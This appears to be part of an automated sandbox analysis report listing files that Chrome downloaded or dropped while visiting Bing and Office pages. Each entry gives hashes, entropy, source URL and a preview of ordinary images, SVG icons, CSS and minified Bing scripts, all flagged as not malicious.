                                                                                                    Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:08:01 11:43:45....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......................................................................................... .. ..... .. .. ..$................H.............. ..$..H .. .....AY .....: ...P$..$.. .tXAI ......@....9..I...Rt....f$.Z....+..,.. .t@1.Q.O=..3.l.#.v..1gZ,...[..A&.y.....j....=-.{.[.....5t.y.q..T..t.UY...Z.,..]....{...bI<.4`..<].m'...D..9.......z5.....0G..U.b.e.qn6k7cwo......1G=......)n..g..1.vZ...jIu..9.c.uo=..>...r..-......2..g.V.Z\.{.^c:..Jj.uY....5-."V...?...(......................!..".. .12#0@ABp...............>.....n..>..z..z..n.' .\.J.-...u#.....c~.@d.......|./..g..v....#..:a_....p=$Z.%.3..SN.G..Hi..*_.W........L.........$.?..p_.w. ..e.h..A..9.-[..n.F.......Q.. .2.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1440 x 1001, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):881847
                                                                                                    Entropy (8bit):7.9872299190546325
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:TB1iSAc4Ggpqd2NIBvRQe/1XlenDK78I5lFDh:TBEcoQ2qBvRL1XIg8I5F
                                                                                                    MD5:575EB26CF254E560FAB26BE95EF3A5EA
                                                                                                    SHA1:6D2188018E9C82D3571F68E0AC8E90A93D40BDCD
                                                                                                    SHA-256:A86828D13978FF8C8E6512764E5DA862E868CE8B57A8316825FF91511D7A7069
                                                                                                    SHA-512:E0564E4A1382E19FF2ADBB09F6CDEDDF02BAA4307A05A86A38A32CF644181DB44325BC787FB3C0022583DFCDEFB9744E40448BCF771CDA4D79AB163C1C0FB5D2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR..............'.V....pHYs.................sRGB.........gAMA......a...tLIDATx.....$.y..>q.uvu..@.q.......4").+J"e[.Mi...d.f<.S.=;.4....3.l..xe.sH.a.c[.F.). @...........3.}./2...2....`.|.d"3.../..;...... .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (667), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):667
                                                                                                    Entropy (8bit):5.251512275863699
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:fr5esz7hNGwXI2QA3QglxfLQOtKfWM1kI2JGC+t5821xw9i/UJpN0I:fr5NhNGOgAggDDQOtjMbhH582Ugk0I
                                                                                                    MD5:2AB12BF4A9E00A1F96849EBB31E03D48
                                                                                                    SHA1:7214619173C4EC069BE1FF00DD61092FD2981AF0
                                                                                                    SHA-256:F8B5ACF4DA28E0617F1C81093192D044BD5A6CC2A2E0C77677F859ADCF3430AC
                                                                                                    SHA-512:7D5AAE775BE1E482EADA1F453BEA2C52A62C552FA94949E6A6081F322E679E916B1276BB59FF28CF7C86D21727BCC329ECB03E5D77CA93204E0CD2694FAA72BD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/chRhkXPE7Aab4f8A3WEJL9KYGvA.js
                                                                                                    Preview:sb_ie&&function(){function h(){if(t){var u=n.replace(/www\./i,"");return f&&i(t,r,n+"?PC="+f)||i(t,r,n)||i(t,r,u)||i(t,r,n+"?Form=HPPDH1")||i(t,r,n+"?PC=BNHP")||i(t,r,n+"?PC=BNSR")}return 0}function c(){return i(_w.external,s,n)!=0}function l(){if(u){var n=2*e+o;if(u==n)return!0}return!1}function a(){var n=_ge("hps");return n||(n=sj_ce("span","hps"),n.style.behavior="url(#default#homepage)",sj_b.appendChild(n)),n}function i(n,t,i){try{return n[t](i)}catch(r){return 0}}var s="IsSearchProviderInstalled",r="isHomepage",n="http://"+_d.domain+"/",u=sj_cook.get("_UR","D"),f=sj_cook.get("SRCHS","PC"),t=a(),e=h(),o=c();l()||(u=2*e+o,sj_cook.set("_UR","D",u,1,"/"))}()
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1333), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1333
                                                                                                    Entropy (8bit):5.118534997873121
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:PlQiztVfI2TdzmkUamV2an3pQ8TIOKEKzbkzER8zXOvD6AYlNyUEr040x0e0v0tn:NQ6rGNIyAbAEuzYDCN2rnWJQSya
                                                                                                    MD5:EEE13BD45C83C7611E9E36689E385FBD
                                                                                                    SHA1:5EA35979E3AC518291E4D7179F417971FD0DC874
                                                                                                    SHA-256:E1DCAF1B7BB92C803802ABAB8D544D277ABF34C06693BD2B83BB598C0DBC7496
                                                                                                    SHA-512:1361145E4C71FC176F76AE84D96F057F8DFA7461FB4926B779F3C059B7C6C8E4BCEFA9B883309D3C3AE6895570F293BF6EEC5374C242C48019CBD6202D4D0373
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/XqNZeeOsUYKR5NcXn0F5cf0NyHQ.js
                                                                                                    Preview:var CaptionClickable;(function(){function t(){for(var i,r=document.querySelectorAll(".b_caption"),u=document.querySelectorAll(".b_imgcap_altitle"),t=0;t<r.length;t++)i=r[t],i&&n(i);for(t=0;t<u.length;t++)i=u[t],i&&n(i)}function n(n){var t=n.previousElementSibling,f,e,o,u,r,s;if(t&&(f=null,t.tagName==="H2"||t.querySelector("h2")?(e=t.tagName==="H2"?t:t.querySelector("h2"),e&&e.querySelector("a")&&(f=e)):t.tagName==="H3"||t.querySelector("h3")?(o=t.tagName==="H3"?t:t.querySelector("h3"),o&&o.querySelector("a")&&(f=o)):f=n.querySelector("h2, h3"),u=n.querySelector("p"),f&&u&&i(u.classList)&&(r=f.querySelector("a"),r))){if(u.addEventListener("mouseover",function(){r&&(r.style.textDecoration="underline",n.style.cursor="pointer")}),u.addEventListener("mouseout",function(){r&&(r.style.textDecoration="",n.style.cursor="")}),s=u.parentElement,s&&s.tagName==="A")return;u.addEventListener("click",function(){if(r){_w.si_T&&_w.si_T(r.getAttribute("h"));var n=window.getSelection();(n===null||n===voi
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 80x80, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1531
                                                                                                    Entropy (8bit):7.562261737548145
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ZtRNh48tJqlVgBYWV3NS+LzIoXhz6lsRtXY+L92k28MKjjhRWpmyCcWnjKL:Z9h48tJ7jM4Iq6lsbX2TcNHuL
                                                                                                    MD5:A441AACFCFD991FC38731D9A87DCF89B
                                                                                                    SHA1:727E7CD1B9DCA6D86B17EDA7B98E295989A8B222
                                                                                                    SHA-256:E904607C1C638C9491A91A41778B9C44AAB696AF6D1CC2EC2D0707E3A8A95940
                                                                                                    SHA-512:812077785D1FA3B8C78B971EDD2324CB97A3A60B05576D402CA4567D9BA42F7ED0841D843B9FFA6DFCA88CACF38825A306E0B2533C21FA1902948C282218D472
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?id=OIF.AS1HJP9x%2biwvewxWojs21w&w=80&h=80&c=1&vt=10&bgcl=c3d18a&r=0&o=6&pid=5.1
                                                                                                    Preview:......JFIF...................................."....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............................"....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............P.P.."................................................j.d.w.3..)C.-.....,.$..S.x.?...u\..{l.1.......*......a.&....nj.&3/..)..._}..t^X.Av..........................................'i.9&....A.#.^.[2........i..Th..........5.........................!1."aq..#2AQS.R...$BCr............?..[.Z.|s.]./Vo!...jmZ...&.G)8Oy....W4.~...I.....y|.S.V.|pH..T.e...eEgv..7,N....%]...V..1.ye..;;...G2H..Y.?s..E.\.....vG^..b2....pyJ...#....2.. ..k.X.....-..8.p.S.d.~......p.i......e!.o...8..I...q[...B.u....}..~I...T.Y@.....;......]}..-.V'.6[.m.;..E.z}.X..p.6#...Ot.b*.*...@.r.zv.....5.k...d..x{...r..Y.I......p.l..%O.V.,.d;...~..<.Z..r8b...Q.....)..k......3H..QS........|..f...hR...........9#...uta...A.#.UR..UF..v.x.......I.pd..G...Y.u....3Q../Y.....O0p.4..x.wX. ...W'wY...K...n.{g..v1.F8.En...bq.......^.b..>.....5..-b%ea...#...
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (824), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):824
                                                                                                    Entropy (8bit):5.3314854117420465
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:2QQ3xVJjKVJ5o7VEioPVKofuVJ0PoRGP2QbAX53CO2Wd6o0YmmBM:AjWUJEhNZsvc8XgO2Wdh0Jm6
                                                                                                    MD5:3FF8EECB7A6996C1056BBE9D4DDE50B4
                                                                                                    SHA1:FDC4D52301D187042D0A2F136CEEF2C005DCBB8B
                                                                                                    SHA-256:01B479F35B53D8078BACA650BDD8B926638D8DAAA6EB4A9059E232DBD984F163
                                                                                                    SHA-512:49E68AA570729CC96ED0FD2F5F406D84869772DF67958272625CBA9D521CA508955567E12573D7C73D7E7727260D746B535C2CE6A3ACE4952EDF8FD85F3DB0DD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/_cTVIwHRhwQtCi8TbO7ywAXcu4s.js
                                                                                                    Preview:(function(){function i(){var f="data-load",u,i;if(n&&!n.hasAttribute(f))try{if(_d.body.appendChild(n),typeof sj_gx=="function"){if(u=r.replace("%IG%",_G.IG).replace("%IID%",n.getAttribute("data-iid")).replace("%PARTNER%",n.getAttribute("data-ptn")).replace("%ENABLEP%",n.getAttribute("data-ep")).replace("%ICONPRELOADED%",n.getAttribute("data-iconpl")),n.setAttribute(f,"1"),i=sj_gx(),!i)return null;i.onreadystatechange=function(){typeof sj_appHTML=="function"&&4==i.readyState&&200==i.status&&sj_appHTML(n,i.responseText)};i.open("GET",t?SbiTst.at(u):u,!0);i.send(null)}}catch(e){}}function u(){if(n){var r=n.getAttribute("data-evt");r&&!t?sj_evt.bind(r,i,!0):i()}}var r="/images/sbi?mmasync=1&ig=%IG%&iid=%IID%&ptn=%PARTNER%&ep=%ENABLEP%&iconpl=%ICONPRELOADED%",n=_ge("sbicom_loader"),t=typeof SbiTst!="undefined";u()})()
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):232
                                                                                                    Entropy (8bit):5.169977030133577
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:2LGXTM4d0QENnOto47NB6iHsrEi/DcSt8JjgICAJAfxito:2Q8nOu47SiHg/ijGmAio
                                                                                                    MD5:5B3E2FD8E824E69B2E32469C046A35E5
                                                                                                    SHA1:AC62B20D73E2FA61030D585DEED53E58D03EF74A
                                                                                                    SHA-256:9077771F70727A1D7007A97FEB2A07CE753E90E3D1DA19A733E46F36E7910397
                                                                                                    SHA-512:01FDE7361CEE5D3CE3093F55BFEA0745670004D228934A46064537288F983D26B62869EF969875E091045E6A28EAE3EF0D9E59E7DE824ED6B76CCE52A9FC7625
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:(function(){function r(r){t&&r[1]&&(typeof mmSetCW!==n&&mmSetCW(),t.show(r[1],!0,i));sj_evt.fire("clearHover")}var n="undefined",t=typeof IFrameOverlay!==n?IFrameOverlay:null,i="&mode=overlay";sj_evt.bind("IFrame.Navigate",r,!0)})()
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (838), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):838
                                                                                                    Entropy (8bit):5.10179630103155
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:01rReu5mXKBj/BsKkRW5LuRWCfRM7ssdvcR:09wwDEw56w2+s6cR
                                                                                                    MD5:8C8B189422C448709EA6BD43EE898AFB
                                                                                                    SHA1:A4D6A99231D951F37D951BD8356D9D17664BF447
                                                                                                    SHA-256:567506D6F20F55859E137FCBD98F9E1A678C0D51192FF186E16FD99D6D301CFF
                                                                                                    SHA-512:6FAA73D59082065426769A27081CBEDCD22146EF948AFDD9A86801F205B2DDDC63E03AC5D555EF0AF23EF05901EBFFE7E8AADD82260EF505CB89D99E572FDF4A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var CursorProgress;(function(n){function f(n){while(n&&n.nodeName!=="A")n=n.parentElement;return n}function e(n){var u,e,o,s;n.button!==0||n.ctrlKey||n.shiftKey||(u=f(sj_et(n)),u!=null)&&u.getAttribute("role")!=="button"&&(r(),e=(u.getAttribute("href")||"").trim().toLowerCase(),e!==""&&e.indexOf("javascript:")!==0&&e.indexOf("#")!==0)&&(o=u.getAttribute("target"),o===null||o.trim()==="")&&(Lib.CssClass.add(u,t),s=_ge("b_content"),s!==null&&Lib.CssClass.add(s,t),i!==null&&(sb_ct(i),i=null),i=sb_st(r,5e3))}function r(){for(var i=_d.getElementsByClassName(t),n=i.length-1;n>=0;n--)Lib.CssClass.remove(i[n],t)}function u(){var r=_ge("b_content"),n,t,i;if(r!==null&&(n=r.getElementsByTagName("A"),n))for(t=0;t<n.length;t++)(i=n[t],i)&&sj_be(i,"click",e)}var t="b_CursorProgress",i=null;n.bind=u;u()})(CursorProgress||(CursorProgress={}))
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (511), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):511
                                                                                                    Entropy (8bit):4.980041296618112
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:yWF4eguIWKvU9bEMsR5OErixCvJO1Vi5rgsM:LF4mKctEMYOK4CvJUVYM
                                                                                                    MD5:D6741608BA48E400A406ACA7F3464765
                                                                                                    SHA1:8961CA85AD82BB701436FFC64642833CFBAFF303
                                                                                                    SHA-256:B1DB1D8C0E5316D2C8A14E778B7220AC75ADAE5333A6D58BA7FD07F4E6EAA83C
                                                                                                    SHA-512:E85360DBBB0881792B86DCAF56789434152ED69E00A99202B880F19D551B8C78EEFF38A5836024F5D61DBC36818A39A921957F13FBF592BAAFD06ACB1AED244B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var BingAtWork;(function(n){var t;(function(n){function t(t,i){var u,r;t.isAuthenticated&&(n.raiseAuthEventAndLog(t),u=_ge("sb_form_q"),u&&(r=u.getAttribute("value"),r&&(n.fetchLowerHeader(r),n.fetchScopeBar(r),i.notifEnabled&&i.notifFetchAsync&&n.fetchNotificationConditional())))}function i(n,i){n&&n.length==2&&t(n[1],i)}n.bindToConditionalSignIn=function(n){sj_evt.bind("ssofirstquery",function(t){return i(t,n)},!0,null,!1)}})(t=n.ConditionalSignIn||(n.ConditionalSignIn={}))})(BingAtWork||(BingAtWork={}))
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1111
                                                                                                    Entropy (8bit):4.61511796141903
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:twgonGLheJUVYxCdBTMqTS05sLGkkhQgbQgwHW4QhJ:6gAShpyxCdBTrS05sLKhvUfSJ
                                                                                                    MD5:C04C8834AC91802186E6CE677AE4A89D
                                                                                                    SHA1:367147873DA32FACB30A1B4885A07920854A6399
                                                                                                    SHA-256:46CC84BA382B065045DB005E895414686F2E76B64AF854F5AD1AC0DF020C3BDB
                                                                                                    SHA-512:82388309085BD143E32981FE4C79604DCEFC4222FB2B53A8625852C3572BDE3D3A578DD558478E6A18F7863CC4EC19DFBA3EE78AD8A4CC71917BFFE027DC22C0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:<svg width="20px" height="16px" viewBox="0 0 20 16" focusable="false" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. <g transform="translate(-10, -12)" fill="#007DAA" >.. <path d="M28.125,14.4615385 L25,14.4615385 L24.26875,13.0203077 C23.95125,12.3950769 23.30125,12 22.59125,12 L17.40875,12 C16.69875,12 16.04875,12.3950769 15.73125,13.0203077 L15,14.4615385 L11.875,14.4615385 C10.84,14.4615385 10,15.2886154 10,16.3076923 L10,26.1538462 C10,27.1729231 10.84,28 11.875,28 L28.125,28 C29.16,28 30,27.1729231 30,26.1538462 L30,16.3076923 C30,15.2886154 29.16,14.4615385 28.125,14.4615385 Z M20,25.5384615 C17.23875,25.5384615 15,23.3341538 15,20.6153846 C15,17.8966154 17.23875,15.6923077 20,15.6923077 C22.76125,15.6923077 25,17.8966154 25,20.6153846 C25,23.3341538 22.76125,25.5384615 20,25.5384615 Z M20,18.1538462 C18.62125,18.1538462 17.5,19.2578462 17.5,20.6153846 C17.5,21.9729231 18.62125,23.0769231 20,23.0769231 C21.37875,23.0769231
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):251464
                                                                                                    Entropy (8bit):5.983609623990004
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:nMPvxEWQIGKwqfsCbL8IcfD4eeC6TahNXrozt135uSMgttkwhf8Q:nCvCj7gsdgvMSDtt3F8Q
                                                                                                    MD5:9299D81EAABDBB856AB23BE6A57F444F
                                                                                                    SHA1:6C87AF0395C5838B832472845732EF5690C224B5
                                                                                                    SHA-256:F643529F69D88A9255A826EC3A18659B70456141E5EC6BAD94CAFB687EC5543C
                                                                                                    SHA-512:BF0F3617226894E98D7AAADDF786D333BA0A7F4F970C64241526FA1FC9EF724A4B3952EE322208A2BB1A36A9EAA7D016C5D0C7B53032EB705DD77DA8A26758A3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/bundles/unauth-9299d81eaa.css
                                                                                                    Preview:.ms-Icon,.ms-ohp-Icon,.ms-ohp-Icon:before{speak:none;font-variant:normal;text-transform:none;line-height:1em;-webkit-font-smoothing:antialiased;font-weight:400;vertical-align:middle}@font-face{font-family:office365icons;src:url(/css/webfonts/office365icons.eot?);src:url(data:application/octet-stream;base64,d09GRgABAAAAACtMAA4AAAAARkgAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAABPUy8yAAABRAAAAEQAAABWNeFFDWNtYXAAAAGIAAAAlAAAAeLMcNF9Y3Z0IAAAAhwAAAAUAAAAHAZN/5hmcGdtAAACMAAABPkAAAmRigp4O2dhc3AAAAcsAAAACAAAAAgAAAAQZ2x5ZgAABzQAACApAAAzHCacVyhoZWFkAAAnYAAAAC8AAAA2FCD/dWhoZWEAACeQAAAAHgAAACQOdQqHaG10eAAAJ7AAAAAuAAAAiI66AABsb2NhAAAn4AAAAEYAAABGtGSoRG1heHAAACgoAAAAIAAAACACAwrCbmFtZQAAKEgAAAGUAAADFTJUT1dwb3N0AAAp3AAAARYAAAGQtCqpVXByZXAAACr0AAAAVgAAAFaSoZr/eJxjYGQxZpzAwMrAwVTFtIeBgaEHQjM+YDBkZGJgYGJgZWbACgLSXFMYHB4wPZ7AHPQ/iyGKmZfBFyjMCJIDANapC2B4nGNgYGBmgGAZBkYGELgD5DGC+SwMB4C0DoMCkMXDwPCA6YHYA6cHXg9CHyQ9SHnQ8aDrwdYHOx9KPEx4OPORyiP3RxGPKx/3PJ7w/z/IGKyqt6OpbnrcD1It/1/+jfxB+V3yG+SXyC+Wb5Cvlw+VD5H7Jrderlz2rexp2d0y
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                    Category:dropped
                                                                                                    Size (bytes):964
                                                                                                    Entropy (8bit):4.421237058266115
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:t741nTY2jmYXhgauOwgXl3gHuWg9cZLzix9QiVCVCTikxQmQ6Nkpgeoo7:dQnkwXhnuOwIlwHuW7nC9QkaUzQm3Nk5
                                                                                                    MD5:88E3ED3DD7EEE133F73FFB9D36B04B6F
                                                                                                    SHA1:518B54603727D68665146F987C13F3E7DCDE8D82
                                                                                                    SHA-256:A39AB0A67C08D907EDDB18741460399232202C26648D676A22AD06E9C1D874CB
                                                                                                    SHA-512:90FF1284A7FEB9555DFC869644BD5DF8A022AE7873547292D8F6A31BA0808613B6A7F23CB416572ADB298EEE0998E0270B78F41C619D84AB379D0CA9D1D9DA6B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" enable-background="new 0 0 16 16"><g fill="#00809D"><path d="M2.25 0h-1.25c-.263 0-.521.107-.707.293-.186.186-.293.444-.293.707v1.25c0 .552.448 1 1 1s1-.448 1-1v-.25h.25c.552 0 1-.448 1-1s-.448-1-1-1zM1 8.75c.552 0 1-.448 1-1v-1.5c0-.552-.448-1-1-1s-1 .448-1 1v1.5c0 .552.448 1 1 1zM2.25 12h-.25v-.25c0-.552-.448-1-1-1s-1 .448-1 1v1.25c0 .263.107.521.293.707s.444.293.707.293h1.25c.552 0 1-.448 1-1s-.448-1-1-1zM11.75 2h.25v.25c0 .552.448 1 1 1s1-.448 1-1v-1.25c0-.263-.107-.521-.293-.707-.186-.186-.444-.293-.707-.293h-1.25c-.552 0-1 .448-1 1s.448 1 1 1zM6.25 2h1.5c.552 0 1-.448 1-1s-.448-1-1-1h-1.5c-.552 0-1 .448-1 1s.448 1 1 1zM14.5 7h-.5v-.75c0-.552-.448-1-1-1s-1 .448-1 1v.75h-3.5c-.828 0-1.5.671-1.5 1.5v3.5h-.75c-.552 0-1 .448-1 1s.448 1 1 1h.75v.5c0 .828.672 1.5 1.5 1.5h6c.828 0 1.5-.672 1.5-1.5v-6c0-.829-.672-1.5-1.5-1.5z"/></g><path fill="none" d="M0 0h16v16h-16z"/></svg>
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1440 x 1001, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):881847
                                                                                                    Entropy (8bit):7.9872299190546325
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:TB1iSAc4Ggpqd2NIBvRQe/1XlenDK78I5lFDh:TBEcoQ2qBvRL1XIg8I5F
                                                                                                    MD5:575EB26CF254E560FAB26BE95EF3A5EA
                                                                                                    SHA1:6D2188018E9C82D3571F68E0AC8E90A93D40BDCD
                                                                                                    SHA-256:A86828D13978FF8C8E6512764E5DA862E868CE8B57A8316825FF91511D7A7069
                                                                                                    SHA-512:E0564E4A1382E19FF2ADBB09F6CDEDDF02BAA4307A05A86A38A32CF644181DB44325BC787FB3C0022583DFCDEFB9744E40448BCF771CDA4D79AB163C1C0FB5D2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-edu-3-mreb-575eb26cf2.png
                                                                                                    Preview:.PNG........IHDR..............'.V....pHYs.................sRGB.........gAMA......a...tLIDATx.....$.y..>q.uvu..@.q.......4").+J"e[.Mi...d.f<.S.=;.4....3.l..xe.sH.a.c[.F.). @...........3.}./2...2....`.|.d"3.../..;...... .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (918), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):918
                                                                                                    Entropy (8bit):5.212381384143468
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:i2387E/Xv3qtMbKRgibYe9BqoGbKR7oGbY7oGbnewCY0ZWFU0fZy5c6MwQOR:dqtMbK7bLrGbKuGbjGbnXTWWSr5c6MwV
                                                                                                    MD5:341FC0ACD15DF6D8A064E4C3A896F65D
                                                                                                    SHA1:1258FD48A874D80CB635BE454F9E4023A0DF7C49
                                                                                                    SHA-256:4BC6635D4D95F9C05A91904B19370A40CC6E4C2AB43661C00615EDDADEFCF9EB
                                                                                                    SHA-512:6B552D786E782C36F17BEE1A6AE204F1E8C9F85BE5EB9ADAC1793D60B537CAD13228CB2D4299949F051E6BC364C2E5A4105DE9BBF2885F492EDB425CB14CE982
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/Elj9SKh02Ay2Nb5FT55AI6DffEk.js
                                                                                                    Preview:var KeyPressScroll;(function(){function i(i){var u=i.key,f=document.activeElement,r,e,o;document.querySelector("cib-serp[mode='conversation']")||document.querySelector(".b_selected")||typeof i.composedPath=="function"&&(r=i.composedPath(),r&&r[0]&&(r[0]instanceof HTMLInputElement||r[0]instanceof HTMLTextAreaElement))||i.ctrlKey||i.shiftKey||i.metaKey||i.altKey||!u||u.length!==1||u===" "||f instanceof HTMLInputElement||f instanceof HTMLTextAreaElement||f instanceof HTMLElement&&f.isContentEditable||(typeof sj_log=="function"&&sj_log("CI.KeyPressScroll","KeyBoard_Triggered",u),n.value="",t.scrollIntoView({behavior:"smooth"}),t.style.display="block",e=_ge("sb_form"),e&&Lib.CssClass.remove(e,"form_sb_hidden"),n.focus(),n.click(),o=n.value,n.setSelectionRange(o.length,o.length))}function r(){n&&t&&sj_be(document,"keydown",i,!0)}var n=_ge("sb_form_q"),t=_ge("b_header");r()})(KeyPressScroll||(KeyPressScroll={}))
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x186, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):12572
                                                                                                    Entropy (8bit):7.95626365233012
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:ZMchRVevzTj09poDNFbzQoT8l13KwM+LH:ZMc3UvHgkFbDy3b
                                                                                                    MD5:ADB388B2BC100C9345D76347B6FD59E6
                                                                                                    SHA1:EF2AAC55FA94FD66BD6A11A420E615217BB1FFEC
                                                                                                    SHA-256:BF678D27302361C76CD1AC179C157DDB3E7139F756487DA534A4937E1772038A
                                                                                                    SHA-512:D1C5DAA9705A8414316BD982F22C7B6D949D79E2575800E689967BE44B54008BE1BAB8D0BE2BF752ADB699B55B9B54F2A9833C7EDDA229C05BF2A184953A5345
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?id=OVFT.f84kLPnwraRtev4FtJX9ES&pid=News&w=300&h=186&c=14&rs=2&qlt=90
